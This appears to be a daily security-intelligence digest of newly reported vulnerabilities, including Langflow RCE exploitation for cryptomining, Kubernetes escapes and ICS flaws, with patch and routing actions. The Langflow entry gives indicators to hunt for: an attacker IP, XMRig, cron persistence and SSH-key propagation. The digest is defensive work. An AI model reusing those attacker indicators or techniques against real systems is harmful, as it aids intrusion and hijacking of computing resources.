Langflow RCE exploitation deploys Monero miner on exposed AI endpoints
Classification: NEW. Langflow RCE exploitation deploys Monero miner on exposed AI endpoints is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation. Current exploitation reporting comes from The Hacker News and Trend Micro.
Recommended action: Treat exposed Langflow as incident-response scope; hunt 83.142.209[.]214, lambsys, XMRig, cron persistence, and SSH-key propagation.
Identifiers: CVE-2026-33017
Sources: [The Hacker News report](https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html)
Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund
Classification: NEW. Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Route JBoss EAP and Undertow owners for fixed package validation.
Identifiers: WID-SEC-2026-0054 / CVE-2024-3884 / CVE-2025-12543 / CVE-2025-9784
Sources: [CERT-Bund WID-SEC-2026-0054](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0054)
OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows
Classification: NEW. OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Patch DCMTK and review C-GET storage mode in healthcare imaging workflows.
Identifiers: CVE-2026-50003
Sources: [CISA medical advisory](https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01)
Fission podSpec injection enables Kubernetes node escape and cluster takeover
Classification: NEW. Fission podSpec injection enables Kubernetes node escape and cluster takeover is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Update Fission to v1.24.0 and validate admission controls for privileged podSpec fields.
Identifiers: CVE-2026-50545 / CVE-2026-50563
Sources: [Fission release notes](https://github.com/fission/fission/releases/tag/v1.24.0); [GitHub advisory GHSA-wmgg-3p4h-48x7](https://github.com/advisories/GHSA-wmgg-3p4h-48x7); [GitHub advisory GHSA-v455-mv2v-5g92](https://github.com/advisories/GHSA-v455-mv2v-5g92)
StoneFly Storage Concentrator exposes unauthenticated root command execution
Classification: NEW. StoneFly Storage Concentrator exposes unauthenticated root command execution is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Patch or isolate Storage Concentrator / SCVM versions below fixed 8.0.4.x builds.
Identifiers: CVE-2026-56415 / CVE-2026-56413 / CVE-2026-50110
Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-06)
Progress Kemp LoadMaster CVE-2026-8037 patch-release item re-promoted by sidecar
Classification: UPDATED(patch_released). Today's delta is patch released. Treat this as a material update to an ongoing story, not as a new technical class.
Identifiers: CVE-2026-8037
Sources: [The Hacker News report](https://thehackernews.com/2026/06/progress-kemp-loadmaster-flaw-could-let.html)
CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu
Classification: NEW. CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Update HPLIP packages where Linux endpoints or servers process untrusted print/document inputs.
Identifiers: CVE-2026-8631 / CVE-2026-8632 / USN-8483-1
Sources: [Ubuntu security notice](https://ubuntu.com/security/notices/USN-8483-1)
Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund
Classification: NEW. Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Route Angular application owners to confirm deployed versions and fixed advisory mapping.
Identifiers: CVE-2025-66412 / WID-SEC-2025-2708 / GHSA-V4HV-RGFQ-GP49
Sources: [CERT-Bund WID-SEC-2025-2708](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2708)
Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles
Classification: NEW. Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Patch FUXA <=1.3.1 and restrict unauthenticated API paths.
Identifiers: CVE-2026-13207
Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-02)
AdonisJS bodyparser CVE-2026-48795 incomplete fix
Classification: NEW. AdonisJS bodyparser CVE-2026-48795 incomplete fix is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
Recommended action: Upgrade @adonisjs/bodyparser to 10.1.5 or 11.0.3 where multipart uploads are accepted.
Identifiers: CVE-2026-48795 / GHSA-qcm7-3vpr-hj5h
Sources: [GitHub advisory GHSA-qcm7-3vpr-hj5h](https://github.com/advisories/GHSA-qcm7-3vpr-hj5h); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3)
Also tracked
- CVE-2026-49432 Apache ActiveMQ reaches BSI broker-owner routing · CVE-2026-49432 · High
- CVE-2026-49451 Microsoft.OpenAPI parser termination patched · CVE-2026-49451 · High
- Sigstore Fulcio OIDC redirect handling can leak Kubernetes service-account tokens · CVE-2026-49478 · High
- NCSC-NL routes Citrix NetScaler ADC/Gateway · CVE-2026-8451 · High
- GNU gzip CVE-2026-41991 and CVE-2026-41992 reach MSRC · CVE-2026-41991 · Medium
- Apple WebKit/iOS/macOS/Safari CVE-2026-43707 patch batch · CVE-2026-43707 · Medium
- Sigstore Timestamp Authority unauthenticated requests can exhaust memory · CVE-2026-49835 · Medium
- CVE-2026-50229 Apache Tomcat reaches BSI and CERT-FR routing · CVE-2026-50229 · Medium
- MSRC libxml2 CVE-2026-11979 stack-based buffer overflow · CVE-2026-11979 · Low
- CVE-2026-52747 OWASP ModSecurity bypass reaches BSI high queue · CVE-2026-52747 · Unknown
- WID-SEC-2026-2136 Icinga high-severity multi-vulnerability advisory
- WID-SEC-2026-2132 NATS Server high-severity multi-vulnerability advisory
- WID-SEC-2026-2133 OpenClaw high-severity multi-vulnerability advisory
- Phantom squatting uses AI-hallucinated domains as a software supply-chain vector
- Bash parser tricks expand AI coding-agent supply-chain concern
- Nissan discloses employee data breach linked to Oracle zero-day attacks
- PeopleSoft/ShinyHunters campaign adds Nissan and NAIC named victims
- Polymarket frontend supply-chain incident reaches Check Point reporting
- Weekly recap patch/remediation sidecar item remains low-actionability